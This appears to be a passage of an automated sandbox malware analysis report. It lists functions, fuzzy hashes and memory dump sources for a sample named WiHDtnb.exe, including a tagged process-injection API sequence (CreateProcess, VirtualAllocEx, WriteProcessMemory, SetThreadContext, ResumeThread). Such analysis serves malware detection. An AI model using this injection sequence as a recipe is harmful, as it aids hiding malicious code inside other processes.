Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992427446.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 978efe00d6bea6943d99a7a1dade8d5d13f8488a241bd4a12f709f7665062df2
Instruction ID: ca362f13a9d9ec26d1d3ed81adfcdd2f7e9b8deddfc817b325d4b64f05b4301c
Opcode Fuzzy Hash: 978efe00d6bea6943d99a7a1dade8d5d13f8488a241bd4a12f709f7665062df2
Instruction Fuzzy Hash: 04319F7654D3809FD707DF20D994715BFB1AF96314F18C5EAC8894B2A3D33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0097D055 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992427446.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cf53225056e74886f91eafae86c000bcd09a25535d0d3ee5d989a4732960a54
Instruction ID: 963c87d99bd94ac26fb3612500544d075bb42f97a6730bb616868f96d84f18d5
Opcode Fuzzy Hash: 1cf53225056e74886f91eafae86c000bcd09a25535d0d3ee5d989a4732960a54
Instruction Fuzzy Hash: 6621807254D3808FD706DF14D994715BF71AF56214F18C5DAC8498B2A3C23A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0097D294 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992427446.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c594945ab75396917ba5cd062288d9c28c5e348008e3dfdace88655b8e1a60
Instruction ID: 8e4b146cf20b4efeee4d515c314bbfdb9c6071a09738444c5b34956ec7327a0d
Opcode Fuzzy Hash: f3c594945ab75396917ba5cd062288d9c28c5e348008e3dfdace88655b8e1a60
Instruction Fuzzy Hash: 0021F272604204EFDB04DF24D9C0B26BFB9FF88318F24C969D84D4B256C33AD806CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0097D0DC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992427446.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52ab1b693d2e323c1e90ca4af5d98ae197c7a644907e0d16af1f3948f54cfcb7
Instruction ID: 30f9481919ad762c62ce466096ddbcd7b13baef7bae25abb403260c108f00f59
Opcode Fuzzy Hash: 52ab1b693d2e323c1e90ca4af5d98ae197c7a644907e0d16af1f3948f54cfcb7
Instruction Fuzzy Hash: 4521F276608204DFDB08DF24D980B26BB79FF88314F64C969D90D4B396C33AD846CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0097D28F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992427446.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: cc1d69bf142b53cd9421c6689f01752ab7110af97d3743bc9662898ee047a4fc
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 6B118B76504280DFDB06CF14D5C4B15BFB1FF84318F28C6AAD8494B656C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0096D199 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992381712.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_96d000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 681130310c7a692af770b289c2e396b12752397ae39f5b19e44fcdc03aaa3c49
Instruction ID: 72b89abadbf0691f87fdc30f4a62fe26033d84126fa0b26699d8239d2386f9bc
Opcode Fuzzy Hash: 681130310c7a692af770b289c2e396b12752397ae39f5b19e44fcdc03aaa3c49
Instruction Fuzzy Hash: 5A01D0719093449ED7148B5ACDC4B67BFDCEF46324F18C516ED294A196C37D9C40C671

Uniqueness

Uniqueness Score: -1.00%

Function 0096D198 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992381712.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_96d000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78d4b175151c98e6f1fbde63f97f8eac244b39f11b0306ddd75165dd2afa0c80
Instruction ID: 5c7b39be61e684c7263e54ab15c78d240a13b9cf7df6c02ebe0efca0de9df18d
Opcode Fuzzy Hash: 78d4b175151c98e6f1fbde63f97f8eac244b39f11b0306ddd75165dd2afa0c80
Instruction Fuzzy Hash: FCF0F6715053449EE7208A0ACCC4B62FFECEF52334F18C45AED184B296C379AC40CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 052F4598 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd58bcca4c22bed042395e1158fd74d500bb68fbbdead13511c2758130cf6cb7
Instruction ID: 1fdea9ed1d93a245fe7d8ceffa86876bef47c060c01ce3b3c2ca21f647a87aca
Opcode Fuzzy Hash: fd58bcca4c22bed042395e1158fd74d500bb68fbbdead13511c2758130cf6cb7
Instruction Fuzzy Hash: 3EE12774E101198FCB14DFA8D9809AEFBF2BF89305F24D169D518AB356D770A942CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 052F4E08 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3466de96db83f2d8104b33d05f8d9630f0e34c2bc3de73f606cde66c5c1bd46
Instruction ID: 128b3da59837421c3fc48ff4b89555dec2e20cdf2fa67531d1ae5f98299aa5b1
Opcode Fuzzy Hash: b3466de96db83f2d8104b33d05f8d9630f0e34c2bc3de73f606cde66c5c1bd46
Instruction Fuzzy Hash: 96E10674E1411A8FCB14DFA8D5809AEFBF2BF89305F24D169D518AB356D730A942CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 052F6EE0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a86ce926d4e91ba0bab15c8f8835ef63908ec7a41edae03306155d742f3421d7
Instruction ID: b1fb6c01a60b2957e27874dd72f9d1f17138d7e18cd85c74558576aef5b5add2
Opcode Fuzzy Hash: a86ce926d4e91ba0bab15c8f8835ef63908ec7a41edae03306155d742f3421d7
Instruction Fuzzy Hash: 9CE11774E1011A8FCB14DFA8D5809AEFBF2FF89305F248169D919AB356D730A942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 052F49D0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4da929791b73233c8819abe8e3c6a91a1032659dbad702451e752a4cf49a2d35
Instruction ID: a205458064eb9861b22bb2c5c0f97c08dbb9bbc2f110346209b5eb724cc21fa0
Opcode Fuzzy Hash: 4da929791b73233c8819abe8e3c6a91a1032659dbad702451e752a4cf49a2d35
Instruction Fuzzy Hash: 37E11974E101198FCB14DFA8D5809AEFBF2BF89305F24D169D518AB356C771A942CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 052F5240 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ea93948f87a0619f70e1c51908d1194218ac5000e89d16edc46d9c3c6b21c85
Instruction ID: 46a790147f01556f7ff65888515b9e0d32935e6158b7772fb3cc99d0bea24109
Opcode Fuzzy Hash: 6ea93948f87a0619f70e1c51908d1194218ac5000e89d16edc46d9c3c6b21c85
Instruction Fuzzy Hash: 75E11674E142198FCB14DFA8D5809AEFBF2BF89305F24C169D919AB356D730A942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0251E030 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1993490409.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b36e0396018984aeffd78253dedd661749e2c2798f5425fc251d047289bcf53e
Instruction ID: a261419ad65292281838a70e16464d66f3e647d776d23b599870182305b004fe
Opcode Fuzzy Hash: b36e0396018984aeffd78253dedd661749e2c2798f5425fc251d047289bcf53e
Instruction Fuzzy Hash: 9ED10631D2075A8ACB05EB64D950A9DF375FF95300F10CB9AE50937225EB70AAC9CB91

Uniqueness

Uniqueness Score: -1.00%

Function 052F49C0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81b1caeec96539b99d81deaf707ba7c7c8e685b01192706d549cfd3b900869f5
Instruction ID: c0550838640ed9d0e1db92fb7c6743f78097589d28a39429f35e1fe35d753fc4
Opcode Fuzzy Hash: 81b1caeec96539b99d81deaf707ba7c7c8e685b01192706d549cfd3b900869f5
Instruction Fuzzy Hash: 69513A70E102198FCB14DFA9D9845AEFBF2BF89301F24C16AD418A7356D7309A42CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 052F5230 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3e2a8cc717238520e0ae7aa0301b24ec134d6c280c4565ed934f43ccb3c5991
Instruction ID: f02f2afcacd5d009dfd8895c0b8113f7585b4dc6c57bc3180f453de805ed9de3
Opcode Fuzzy Hash: b3e2a8cc717238520e0ae7aa0301b24ec134d6c280c4565ed934f43ccb3c5991
Instruction Fuzzy Hash: AB513B70E142198FDB14CFA9D9849AEFBF2BF89305F24C169D418A7356D7309A42CF60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WiHDtnb.exePID: 3220, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	111
Total number of Limit Nodes:	5

Executed Functions

Function 0632772D Relevance: 1.7, APIs: 1, Instructions: 244
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0632796E

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b1ddbfb8727a483fde7a60fe8a9990022c4f3279086e1981b92cd08ac5d7404d
Instruction ID: da5a41c586fa5d858a943f0ead70665988099c048a8f1656715fcc995fef4b46
Opcode Fuzzy Hash: b1ddbfb8727a483fde7a60fe8a9990022c4f3279086e1981b92cd08ac5d7404d
Instruction Fuzzy Hash: D9915C71D0022ACFDB64CF68C841BEDBBB2FF48314F14856AD819A7284DB759985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06327738 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0632796E

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d9138be40a8c869323fc3cd7543a905f6bfa62d425c0b16eda26fc122aa2f5c6
Instruction ID: b1f480f8cfa14951aa570bbac03ef9a170dee80b77720001a976ea2adf4843d6
Opcode Fuzzy Hash: d9138be40a8c869323fc3cd7543a905f6bfa62d425c0b16eda26fc122aa2f5c6
Instruction Fuzzy Hash: 9C915B71D0022ACFDB64CF68C841BEEBBB2FF48314F1485AAD809A7244DB759985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01314864 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01315D79

Memory Dump Source

Source File: 00000009.00000002.2022442257.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1310000_WiHDtnb.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 609e03037277d2be97a856a564b20035c52892e13e0d45b6e59309dd852693c0
Instruction ID: 462af22fa06cd793d4dacb488f55f2c3ec7582519aa6b5ff680ee2feb9bdd6aa
Opcode Fuzzy Hash: 609e03037277d2be97a856a564b20035c52892e13e0d45b6e59309dd852693c0
Instruction Fuzzy Hash: F541F2B0C0071DCBDB28DFA9C848B9EBBF5BF89304F20805AD408AB255DB756946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01315CBC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01315D79

Memory Dump Source

Source File: 00000009.00000002.2022442257.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1310000_WiHDtnb.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 260df4a71fdbd84d0d6dc515fa51126bc61a376beb2142fa9a9a4f52949e552f
Instruction ID: 7d439c861be967e5475d80be1e09d8fa9d523ce50e7977b1f472917f9a46878b
Opcode Fuzzy Hash: 260df4a71fdbd84d0d6dc515fa51126bc61a376beb2142fa9a9a4f52949e552f
Instruction Fuzzy Hash: 2B41F2B0C00619CBDB28DFA9C8847CDBBB1BF89308F20815AD418AB255DB756946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 063274A8 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06327540

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 41a9006c7b01b96a4dac71b0d2bda7a056ff10a513f3212eeea9533075370122
Instruction ID: a8454f9691fc81ef8943f5cd226da4060e50ccc8c0f9b681c4eafe56540ebb5c
Opcode Fuzzy Hash: 41a9006c7b01b96a4dac71b0d2bda7a056ff10a513f3212eeea9533075370122
Instruction Fuzzy Hash: 9C2148B5D003199FCB10DFA9C881BDEBBF5FF48310F108429E519A7240C7789944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 063274B0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06327540

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b400fa893ff609fd64e59f7ce1dbc21ca82926e139cdcdd7388052ac0eae10be
Instruction ID: 29349e5c27727cc0ea5f3cfad5b111d87520b75e75386c14ade8376868715697
Opcode Fuzzy Hash: b400fa893ff609fd64e59f7ce1dbc21ca82926e139cdcdd7388052ac0eae10be
Instruction Fuzzy Hash: CA2126B59003599FCB10DFAAC885BEEBBF5FF48310F10842AE919A7240C7789944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 06327310 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06327396

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a002327557f262e21d3165bbe30f24cc388d55171a69fff77a4bd06eaf3ca10f
Instruction ID: f527478fc0a6d2b7732f0f33e42e86b4a0e568abc0df0ca4a73dc1daabecc3f5
Opcode Fuzzy Hash: a002327557f262e21d3165bbe30f24cc388d55171a69fff77a4bd06eaf3ca10f
Instruction Fuzzy Hash: DB2128B5D002098FDB10DFAAC8857EEBBF4FF48314F548429D559A7240DB78A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06327599 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06327620

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 28203bd7822aa1c558fed58aea3b1a32c7a9aa1bbf55eb3aec04d300c26fd75e
Instruction ID: e34514ce0389b9aec18096d6dfef6cfc9f7c2f745244976e744173932985ed9b
Opcode Fuzzy Hash: 28203bd7822aa1c558fed58aea3b1a32c7a9aa1bbf55eb3aec04d300c26fd75e
Instruction Fuzzy Hash: 192139B5D003599FCB10DFAAC881AEEFBF5FF48310F54842AE559A7240C7389945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 063275A0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06327620

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c96f2fdfdfd7070349a0f68eaa2fda764f475200ec158ce025e2d92eca947df7
Instruction ID: 4cbf9ea568d4bbb2580e9a04182d5cf80270df11def5199b0729666b94d8ee14
Opcode Fuzzy Hash: c96f2fdfdfd7070349a0f68eaa2fda764f475200ec158ce025e2d92eca947df7
Instruction Fuzzy Hash: 2F2138B1C003599FCB10DFAAC880AEEFBF5FF48310F10842AE519A7240C738A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06327318 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06327396

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4701461660c2deab071261ffabe19ebd837578024ee09b168be0a40d934a9da2
Instruction ID: d2c633ce118247a8552bd600985998eb342100ca02912203e61434570ab0ab88
Opcode Fuzzy Hash: 4701461660c2deab071261ffabe19ebd837578024ee09b168be0a40d934a9da2
Instruction Fuzzy Hash: 1A2125B1D002098FDB10DFAAC8857EEBBF4BF88310F10842AD559A7240CB78A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 063273E8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0632745E

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c2987d7a7f61a0306e83e1add604b7df364fbbe438a7d29c4ccb434fa7bb7cce
Instruction ID: 4ac45a482698c2ad0f7ebe6bae5d37eee03e95b258b8927b5507951a3c353102
Opcode Fuzzy Hash: c2987d7a7f61a0306e83e1add604b7df364fbbe438a7d29c4ccb434fa7bb7cce
Instruction Fuzzy Hash: 1E1159768002099FCB10DFAAC845AEFBFF5FF48310F108419E559A7250CB39A545CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 063273F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0632745E

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: db0eb043ad623048ddd0ecb392c918f5373786a66b3cbdf217b2f37274e9548f
Instruction ID: 880785cf6b41b6bb7087c8a8c98fc17c89e3465732c5739c9a1d4fcf5ab992e8
Opcode Fuzzy Hash: db0eb043ad623048ddd0ecb392c918f5373786a66b3cbdf217b2f37274e9548f
Instruction Fuzzy Hash: 4C1126759002499FCB10DFAAC844AEEBFF5FF88324F108419E519A7250C779A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06326E2A Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06326E92

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a00ffcde97ec340fa94bf2d56632e0b8e2c258d8fbb4a972b20a81a225fea0ac
Instruction ID: f23de8632ed6dfad8232fa28afbd37da57a907d9688e3eef2e99d40e2dcde898
Opcode Fuzzy Hash: a00ffcde97ec340fa94bf2d56632e0b8e2c258d8fbb4a972b20a81a225fea0ac
Instruction Fuzzy Hash: 271158B5D002498FCB10DFAAC8457EFFBF5EF89320F24841AD559A7240CB39A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06326E30 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06326E92

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d2713cb56522065ed6a9b4e6fd08fd4e65429ebc4f3fac2b1cfbbf52afdf11c9
Instruction ID: 07df2beb3cb8b0b62ede3616851a6eb772a7ca1e084a178adae0fca6b63c0b17
Opcode Fuzzy Hash: d2713cb56522065ed6a9b4e6fd08fd4e65429ebc4f3fac2b1cfbbf52afdf11c9
Instruction Fuzzy Hash: EF1128B1D002498FDB10DFAAC9457AFFBF5EF89324F208419D519A7240CB79A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06328F68 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0632AD35

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7d5c9e0f6c40a12ef2cfdcb34d141b190b8f7d3490a622995d7468054deefd08
Instruction ID: f57014cb43c9920b32f863746d222989fb634806e00ac60a0eec44b4a5c834fb
Opcode Fuzzy Hash: 7d5c9e0f6c40a12ef2cfdcb34d141b190b8f7d3490a622995d7468054deefd08
Instruction Fuzzy Hash: 0B11F2B58003599FDB50DF9AC984BDEFBF8EB48720F10841AE918A7600C379A944CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 0632ACD1 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0632AD35

Memory Dump Source

Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: fa0fdcb2b821d88b260e04fd13dcf2a05755c1c057af6e440f6177c4ce9751f8
Instruction ID: b12215580207da109f01724f680965cb58bd7ebf5519f82352ebe97fe6432c60
Opcode Fuzzy Hash: fa0fdcb2b821d88b260e04fd13dcf2a05755c1c057af6e440f6177c4ce9751f8
Instruction Fuzzy Hash: 9D1103B5800349DFDB10DF9AC985BDEFBF8EB48320F10841AE958A7200C379A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0585B0CC Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

A, xrefs: 0585B0E4

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 1bcc741df9b4ce0a95919de375ad4ba2a16ba5770d75c74efd4b114b7314f87c
Instruction ID: 7d4ce8d544f9bac606e6c62193c11187e995ad28a5d318cbdd33755b0eae573b
Opcode Fuzzy Hash: 1bcc741df9b4ce0a95919de375ad4ba2a16ba5770d75c74efd4b114b7314f87c
Instruction Fuzzy Hash: DD316931A44508CBCB54CFA9D885BAAB7B2BB1432AF158167ED27DB292D774DC408B11

Uniqueness

Uniqueness Score: -1.00%

Function 0585CD58 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
